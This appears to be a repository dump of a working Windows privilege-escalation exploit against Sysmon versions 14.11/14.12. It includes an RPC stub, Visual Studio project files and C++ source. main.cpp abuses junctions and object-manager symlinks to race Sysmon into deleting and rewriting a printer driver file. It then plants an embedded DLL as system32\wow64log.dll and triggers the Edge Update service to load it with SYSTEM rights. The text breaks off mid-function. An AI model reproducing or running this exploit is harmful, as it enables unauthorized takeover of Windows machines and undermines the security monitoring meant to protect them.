/* at Mon Jan 18 19:14:07 2038
*/
/* Compiler settings for sysmon.idl:
Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622
protocol : all , ms_ext, c_ext, robust
error checks: allocation ref bounds_check enum stub_data
VC __declspec() decoration level:
__declspec(uuid()), __declspec(selectany), __declspec(novtable)
DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING( ) */
#if defined(_M_AMD64)
#if !defined(__RPC_WIN64__)
#error Invalid build platform for this stub.
#endif
#include "ndr64types.h"
#include "pshpack8.h"
typedef
struct _NDR64_CONFORMANT_STRING_FORMAT
__midl_frag7_t;
extern const __midl_frag7_t __midl_frag7;
typedef
struct _NDR64_POINTER_FORMAT
__midl_frag6_t;
extern const __midl_frag6_t __midl_frag6;
typedef
NDR64_FORMAT_CHAR
__midl_frag5_t;
extern const __midl_frag5_t __midl_frag5;
typedef
struct
{
struct _NDR64_PROC_FORMAT frag1;
struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2;
struct _NDR64_PARAM_FORMAT frag3;
struct _NDR64_PARAM_FORMAT frag4;
}
__midl_frag4_t;
extern const __midl_frag4_t __midl_frag4;
typedef
struct
{
struct _NDR64_PROC_FORMAT frag1;
struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2;
struct _NDR64_PARAM_FORMAT frag3;
}
__midl_frag2_t;
extern const __midl_frag2_t __midl_frag2;
typedef
NDR64_FORMAT_UINT32
__midl_frag1_t;
extern const __midl_frag1_t __midl_frag1;
static const __midl_frag7_t __midl_frag7 =
{
/* *wchar_t */
{
/* *wchar_t */
0x64, /* FC64_CONF_WCHAR_STRING */
{
/* *wchar_t */
0,
0,
0,
0,
0,
0,
0,
0
},
(NDR64_UINT16) 2 /* 0x2 */
}
};
static const __midl_frag6_t __midl_frag6 =
{
/* *wchar_t */
0x20, /* FC64_RP */
(NDR64_UINT8) 0 /* 0x0 */,
(NDR64_UINT16) 0 /* 0x0 */,
&__midl_frag7
};
static const __midl_frag5_t __midl_frag5 =
0x5 /* FC64_INT32 */;
static const __midl_frag4_t __midl_frag4 =
{
/* Proc1 */
{
/* Proc1 */ /* procedure Proc1 */
(NDR64_UINT32) 17039424 /* 0x1040040 */, /* explicit handle */ /* IsIntrepreted, ClientMustSize, HasExtensions */
(NDR64_UINT32) 24 /* 0x18 */ , /* Stack size */
(NDR64_UINT32) 8 /* 0x8 */,
(NDR64_UINT32) 0 /* 0x0 */,
(NDR64_UINT16) 0 /* 0x0 */,
(NDR64_UINT16) 0 /* 0x0 */,
(NDR64_UINT16) 2 /* 0x2 */,
(NDR64_UINT16) 8 /* 0x8 */
},
{
/* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */
{
/* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */
0x72, /* FC64_BIND_PRIMITIVE */
(NDR64_UINT8) 0 /* 0x0 */,
0 /* 0x0 */, /* Stack offset */
(NDR64_UINT8) 0 /* 0x0 */,
(NDR64_UINT8) 0 /* 0x0 */
},
(NDR64_UINT16) 0 /* 0x0 */ /* Notify index */
},
{
/* arg_0 */ /* parameter arg_0 */
&__midl_frag5,
{
/* arg_0 */
0,
0,
0,
1,
0,
0,
1,
1,
0,
0,
0,
0,
0,
(NDR64_UINT16) 0 /* 0x0 */,
0
}, /* [in], Basetype, ByValue */
(NDR64_UINT16) 0 /* 0x0 */,
8 /* 0x8 */, /* Stack offset */
},
{
/* arg_1 */ /* parameter arg_1 */
&__midl_frag7,
{
/* arg_1 */
1,
1,
0,
1,
0,
0,
0,
0,
1,
0,
0,
0,
0,
(NDR64_UINT16) 0 /* 0x0 */,
0
}, /* MustSize, MustFree, [in], SimpleRef */
(NDR64_UINT16) 0 /* 0x0 */,
16 /* 0x10 */, /* Stack offset */
}
};
static const __midl_frag2_t __midl_frag2 =
{
/* Proc0 */
{
/* Proc0 */ /* procedure Proc0 */
(NDR64_UINT32) 17301568 /* 0x1080040 */, /* explicit handle */ /* IsIntrepreted, HasReturn, HasExtensions */
(NDR64_UINT32) 16 /* 0x10 */ , /* Stack size */
(NDR64_UINT32) 0 /* 0x0 */,
(NDR64_UINT32) 8 /* 0x8 */,
(NDR64_UINT16) 0 /* 0x0 */,
(NDR64_UINT16) 0 /* 0x0 */,
(NDR64_UINT16) 1 /* 0x1 */,
(NDR64_UINT16) 8 /* 0x8 */
},
{
/* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */
{
/* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */
0x72, /* FC64_BIND_PRIMITIVE */
(NDR64_UINT8) 0 /* 0x0 */,
0 /* 0x0 */, /* Stack offset */
(NDR64_UINT8) 0 /* 0x0 */,
(NDR64_UINT8) 0 /* 0x0 */
},
(NDR64_UINT16) 0 /* 0x0 */ /* Notify index */
},
{
/* long */ /* parameter long */
&__midl_frag5,
{
/* long */
0,
0,
0,
0,
1,
1,
1,
1,
0,
0,
0,
0,
0,
(NDR64_UINT16) 0 /* 0x0 */,
0
}, /* [out], IsReturn, Basetype, ByValue */
(NDR64_UINT16) 0 /* 0x0 */,
8 /* 0x8 */, /* Stack offset */
}
};
static const __midl_frag1_t __midl_frag1 =
(NDR64_UINT32) 0 /* 0x0 */;
#include "poppack.h"
static const FormatInfoRef DefaultIfName_Ndr64ProcTable[] =
{
&__midl_frag2,
&__midl_frag4
};
static const MIDL_STUB_DESC DefaultIfName_StubDesc =
{
(void *)& DefaultIfName___RpcServerInterface,
MIDL_user_allocate,
MIDL_user_free,
0,
0,
0,
0,
0,
sysmon__MIDL_TypeFormatString.Format,
1, /* -error bounds_check flag */
0x60001, /* Ndr library version */
0,
0x801026e, /* MIDL Version 8.1.622 */
0,
0,
0, /* notify & notify_flag routine table */
0x2000001, /* MIDL flag */
0, /* cs routines */
(void *)& DefaultIfName_ServerInfo, /* proxy/server info */
0
};
static const RPC_DISPATCH_FUNCTION DefaultIfName_NDR64__table[] =
{
NdrServerCallAll,
NdrServerCallAll,
0
};
static const RPC_DISPATCH_TABLE DefaultIfName_NDR64__v1_0_DispatchTable =
{
2,
(RPC_DISPATCH_FUNCTION*)DefaultIfName_NDR64__table
};
static const MIDL_SYNTAX_INFO DefaultIfName_SyntaxInfo [ 2 ] =
{
{
{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},
(RPC_DISPATCH_TABLE*)&DefaultIfName_v1_0_DispatchTable,
sysmon__MIDL_ProcFormatString.Format,
DefaultIfName_FormatStringOffsetTable,
sysmon__MIDL_TypeFormatString.Format,
0,
0,
0
}
,{
{{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}},
(RPC_DISPATCH_TABLE*)&DefaultIfName_NDR64__v1_0_DispatchTable,
0 ,
(unsigned short *) DefaultIfName_Ndr64ProcTable,
0,
0,
0,
0
}
};
static const SERVER_ROUTINE DefaultIfName_ServerRoutineTable[] =
{
(SERVER_ROUTINE)Proc0,
(SERVER_ROUTINE)Proc1
};
static const MIDL_SERVER_INFO DefaultIfName_ServerInfo =
{
&DefaultIfName_StubDesc,
DefaultIfName_ServerRoutineTable,
sysmon__MIDL_ProcFormatString.Format,
(unsigned short *) DefaultIfName_FormatStringOffsetTable,
0,
(RPC_SYNTAX_IDENTIFIER*)&_NDR64_RpcTransferSyntax,
2,
(MIDL_SYNTAX_INFO*)DefaultIfName_SyntaxInfo
};
#if _MSC_VER >= 1200
#pragma warning(pop)
#endif
#endif /* defined(_M_AMD64)*/
================================================
FILE: v2/README.md
================================================
Exploit for versions 14.11/14.12 (works on versions below 14.11 but less stable as we need to race with Sysmon).
================================================
FILE: v2/SysmonEoP/SysmonEOP.sln
================================================
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.30717.126
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SysmonEOP", "SysmonEOP.vcxproj", "{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Debug|x64.ActiveCfg = Debug|x64
{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Debug|x64.Build.0 = Debug|x64
{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Debug|x86.ActiveCfg = Debug|Win32
{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Debug|x86.Build.0 = Debug|Win32
{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Release|x64.ActiveCfg = Release|x64
{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Release|x64.Build.0 = Release|x64
{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Release|x86.ActiveCfg = Release|Win32
{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {EA809E7C-ABAC-45B5-BE5B-2F48BFC601DA}
EndGlobalSection
EndGlobal
================================================
FILE: v2/SysmonEoP/SysmonEOP.vcxproj
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>16.0</VCProjectVersion>
<Keyword>Win32Proj</Keyword>
<ProjectGuid>{fac6a4f5-2e86-4ef0-a787-669b2a2f28af}</ProjectGuid>
<RootNamespace>SysmonEOP</RootNamespace>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<ProgramDataBaseFileName />
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
<BuildLog>
<Path />
</BuildLog>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="main.cpp" />
<ClCompile Include="sysmon_c.c" />
</ItemGroup>
<ItemGroup>
<Midl Include="sysmon.idl" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="def.h" />
<ClInclude Include="resource.h" />
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="resource.rc" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>
================================================
FILE: v2/SysmonEoP/SysmonEOP.vcxproj.filters
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="main.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="sysmon_c.c">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<Midl Include="sysmon.idl">
<Filter>Source Files</Filter>
</Midl>
</ItemGroup>
<ItemGroup>
<ClInclude Include="def.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="resource.h">
<Filter>Header Files</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="resource.rc">
<Filter>Resource Files</Filter>
</ResourceCompile>
</ItemGroup>
</Project>
================================================
FILE: v2/SysmonEoP/SysmonEOP.vcxproj.user
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
</Project>
================================================
FILE: v2/SysmonEoP/def.h
================================================
#include <Windows.h>
#include <winternl.h>
#include <combaseapi.h>
#include <comdef.h>
#include <stdio.h>
#include <Wbemidl.h>
#include "sysmon_h.h"
#include "resource.h"
#pragma comment(lib, "wbemuuid.lib")
#pragma comment(lib,"RpcRT4.lib")
#pragma warning(disable:4996)
struct __declspec(uuid("A6B716CB-028B-404D-B72C-50E153DD68DA")) CLSID_MSEdge_Object;
class __declspec(uuid("79e0c401-b7bc-4de5-8104-71350f3a9b67")) IGoogleUpdate : IUnknown {
public:
HRESULT CheckForUpdate(const WCHAR* guid, VOID* observer);
HRESULT Update(const WCHAR* guid, VOID* observer);
};
//Variables
wchar_t object[] = L"Global\\GLOBALROOT\\RPC Control\\CLIP-876BEE15B64B610D2505A44596ED92FBA9624DB923F9D608698BD8C8E64E4F1A";
wchar_t sysmon[] = L"C:\\SYSMON";
HANDLE hSysmon;
//Functions*
LPWSTR Find();
void load();
BOOL AddPrinterDriverWmi();
void Trigger(LPWSTR alpc);
LPWSTR BuildPath(LPCWSTR path);
BOOL CreateJunction(HANDLE dir, LPCWSTR target);
BOOL DosDeviceSymLink(LPCWSTR object, LPCWSTR target);
BOOL DelDosDeviceSymLink(LPCWSTR object, LPCWSTR target);
BOOL DeleteJunction(HANDLE dir);
VOID SetJunction();
typedef struct _REPARSE_DATA_BUFFER {
ULONG ReparseTag;
USHORT ReparseDataLength;
USHORT Reserved;
union {
struct {
USHORT SubstituteNameOffset;
USHORT SubstituteNameLength;
USHORT PrintNameOffset;
USHORT PrintNameLength;
ULONG Flags;
WCHAR PathBuffer[1];
} SymbolicLinkReparseBuffer;
struct {
USHORT SubstituteNameOffset;
USHORT SubstituteNameLength;
USHORT PrintNameOffset;
USHORT PrintNameLength;
WCHAR PathBuffer[1];
} MountPointReparseBuffer;
struct {
UCHAR DataBuffer[1];
} GenericReparseBuffer;
} DUMMYUNIONNAME;
} REPARSE_DATA_BUFFER, * PREPARSE_DATA_BUFFER;
typedef struct _OBJECT_DIRECTORY_INFORMATION {
UNICODE_STRING Name;
UNICODE_STRING TypeName;
} OBJECT_DIRECTORY_INFORMATION, * POBJECT_DIRECTORY_INFORMATION;
#define STATUS_MORE_ENTRIES 0x00000105
#define STATUS_NO_MORE_ENTRIES 0x8000001A
#define IO_REPARSE_TAG_MOUNT_POINT (0xA0000003L)
typedef NTSYSAPI NTSTATUS(NTAPI* _NtCreateFile)(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength);
typedef NTSYSAPI VOID(NTAPI* _RtlInitUnicodeString)(PUNICODE_STRING DestinationString, PCWSTR SourceString);
typedef NTSYSAPI NTSTATUS(NTAPI* _NtOpenDirectoryObject)(OUT PHANDLE DirectoryHandle, IN ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes);
typedef NTSYSAPI NTSTATUS(NTAPI* _NtQueryDirectoryObject)(_In_ HANDLE DirectoryHandle, _Out_opt_ PVOID Buffer, _In_ ULONG Length, _In_ BOOLEAN ReturnSingleEntry, _In_ BOOLEAN RestartScan, _Inout_ PULONG Context, _Out_opt_ PULONG ReturnLength);
typedef NTSYSCALLAPI NTSTATUS(NTAPI* _NtSetInformationFile)(HANDLE FileHandle,PIO_STATUS_BLOCK IoStatusBlock,PVOID FileInformation,ULONG Length,ULONG FileInformationClass);
_RtlInitUnicodeString pRtlInitUnicodeString;
_NtCreateFile pNtCreateFile;
_NtSetInformationFile pNtSetInformationFile;
_NtQueryDirectoryObject pNtQueryDirectoryObject;
_NtOpenDirectoryObject pNtOpenDirectoryObect;
================================================
FILE: v2/SysmonEoP/main.cpp
================================================
#include "def.h"
int wmain(int argc, wchar_t* argv[])
{
load();
LPWSTR alpc = Find();
HANDLE h1;
if (alpc == NULL) {
printf("[!] Failed to find ALPC port!\n");
return 1;
}
DosDeviceSymLink(object, BuildPath(L"C:\\Windows\\System32\\DriverStore\\FileRepository\\prnge001.inf_amd64_1daeee8f3aa30fcb\\prnge001.inf"));
CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)SetJunction, NULL, 0, NULL);
Trigger(alpc);
do {
h1 = CreateFile(L"C:\\Windows\\System32\\DriverStore\\FileRepository\\prnge001.inf_amd64_1daeee8f3aa30fcb\\prnge001.inf", GENERIC_READ, FILE_SHARE_READ|FILE_SHARE_DELETE|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
} while (h1 != INVALID_HANDLE_VALUE);
Sleep(500);
CloseHandle(hSysmon);
printf("[+] Driver setup info file deleted!\n");
CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)SetJunction, NULL, 0, NULL);
CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Trigger, alpc, 0, NULL);
do {
h1 = CreateFile(L"C:\\Windows\\System32\\DriverStore\\FileRepository\\prnge001.inf_amd64_1daeee8f3aa30fcb\\prnge001.inf", GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
} while (h1 == INVALID_HANDLE_VALUE);
HMODULE hm = GetModuleHandle(NULL);
HRSRC res = FindResource(hm, MAKEINTRESOURCE(IDR_DLL1), L"dll");
DWORD DllSize = SizeofResource(hm, res);
void* DllBuff = LoadResource(hm, res);
printf("[+] Driver setup info file written.\n");
if (!AddPrinterDriverWmi()) {
printf("[!] Failed to add print driver!\n");
return 1;
}
HANDLE dll;
do {
Sleep(1000);
dll = CreateFile(L"C:\\windows\\system32\\wow64log.dll", GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_DELETE | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
} while (dll == INVALID_HANDLE_VALUE);
printf("[+] DLL created!\n");
WriteFile(dll, DllBuff, DllSize, NULL, NULL);
CloseHandle(dll);
printf("[*] Triggering Edge Update service!\n");
HRESULT coini = CoInitialize(NULL);
IGoogleUpdate* updater = NULL;
HRESULT hr = CoCreateInstance(__uuidof(CLSID_MSEdge_Object), NULL, CLSCTX_LOCAL_SERVER, __uuidof(updater), (PVOID*)&updater);
DelDosDeviceSymLink(object, BuildPath(L"C:\\Windows\\System32\\DriverStore\\FileRepository\\prnge001.inf_amd64_1daeee8f3aa30fcb\\prnge001.inf"));
DeleteJunction(hSysmon);
while(!DeleteFile(L"C:\\windows\\system32\\wow64log.dll")){}
return 0;
}
VOID SetJunction() {
hSysmon = INVALID_HANDLE_VALUE;
;
SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL);
do {
hSysmon = CreateFile(L"C:\\sysmon", FILE_WRITE_ATTRIBUTES | DELETE, FILE_SHARE_DELETE | FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT | FILE_FLAG_DELETE_ON_CLOSE, NULL);
} while (hSysmon == INVALID_HANDLE_VALUE);
CreateJunction(hSysmon, L"\\RPC Control");
}
void load() {
HMODULE ntdll = LoadLibraryW(L"ntdll.dll");
if (ntdll != NULL) {
pRtlInitUnicodeString = (_RtlInitUnicodeString)GetProcAddress(ntdll, "RtlInitUnicodeString");
pNtCreateFile = (_NtCreateFile)GetProcAddress(ntdll, "NtCreateFile");
pNtQueryDirectoryObject = (_NtQueryDirectoryObject)GetProcAddress(ntdll, "NtQueryDirectoryObject");
pNtOpenDirectoryObect = (_NtOpenDirectoryObject)GetProcAddress(ntdll, "NtOpenDirectoryObject");
pNtSetInformationFile = (_NtSetInformationFile)GetProcAddress(ntdll, "NtSetInformationFile");
}
if (pRtlInitUnicodeString == NULL || pNtCreateFile == NULL || pNtQueryDirectoryObject == NULL || pNtOpenDirectoryObect == NULL|| pNtSetInformationFile == NULL) {
printf("Cannot load api's %d\n", GetLastError());
exit(0);
}
}
BOOL CreateJunction(HANDLE hDir, LPCWSTR target) {
HANDLE hJunction;
DWORD cb;
wchar_t printname[] = L"";
if (hDir == INVALID_HANDLE_VALUE) {
printf("[!] HANDLE invalid!\n");
return FALSE;
}
SIZE_T TargetLen = wcslen(target) * sizeof(WCHAR);
SIZE_T PrintnameLen = wcslen(printname) * sizeof(WCHAR);
SIZE_T PathLen = TargetLen + PrintnameLen + 12;
SIZE_T Totalsize = PathLen + (DWORD)(FIELD_OFFSET(REPARSE_DATA_BUFFER, GenericReparseBuffer.DataBuffer));
PREPARSE_DATA_BUFFER Data = (PREPARSE_DATA_BUFFER)malloc(Totalsize);
Data->ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;
Data->ReparseDataLength = PathLen;
Data->Reserved = 0;
Data->MountPointReparseBuffer.SubstituteNameOffset = 0;
Data->MountPointReparseBuffer.SubstituteNameLength = TargetLen;
memcpy(Data->MountPointReparseBuffer.PathBuffer, target, TargetLen + 2);
Data->MountPointReparseBuffer.PrintNameOffset = (USHORT)(TargetLen + 2);
Data->MountPointReparseBuffer.PrintNameLength = (USHORT)PrintnameLen;
memcpy(Data->MountPointReparseBuffer.PathBuffer + wcslen(target) + 1, printname, PrintnameLen + 2);
WCHAR dir[MAX_PATH] = { 0x0 };
if (DeviceIoControl(hDir, FSCTL_SET_REPARSE_POINT, Data, Totalsize, NULL, 0, &cb, NULL) != 0)
{
GetFinalPathNameByHandle(hDir, dir, MAX_PATH, 0);
printf("[+] Junction %ls -> %ls created!\n", dir, target);
free(Data);
return TRUE;
}
else
{
printf("[!] Error: %d. Exiting\n", GetLastError());
free(Data);
return FALSE;
}
}
BOOL DeleteJunction(HANDLE handle) {
REPARSE_GUID_DATA_BUFFER buffer = { 0 };
BOOL ret;
buffer.ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;
DWORD cb = 0;
IO_STATUS_BLOCK io;
if (handle == INVALID_HANDLE_VALUE) {
printf("[!] HANDLE invalid!\n");
return FALSE;
}
WCHAR dir[MAX_PATH] = { 0x0 };
if (DeviceIoControl(handle, FSCTL_DELETE_REPARSE_POINT, &buffer, REPARSE_GUID_DATA_BUFFER_HEADER_SIZE, NULL, NULL, &cb, NULL)) {
GetFinalPathNameByHandle(handle, dir, MAX_PATH, 0);
printf("[+] Junction %ls deleted!\n", dir);
return TRUE;
}
else
{
printf("[!] Error: %d.\n", GetLastError());
return FALSE;
}
}
BOOL DosDeviceSymLink(LPCWSTR object, LPCWSTR target) {
if (DefineDosDevice(DDD_NO_BROADCAST_SYSTEM | DDD_RAW_TARGET_PATH, object, target)) {
printf("[+] Symlink %ls -> %ls created!\n", object, target);
return TRUE;
}
else
{
printf("error :%d\n", GetLastError());
return FALSE;
}
}
BOOL DelDosDeviceSymLink(LPCWSTR object, LPCWSTR target) {
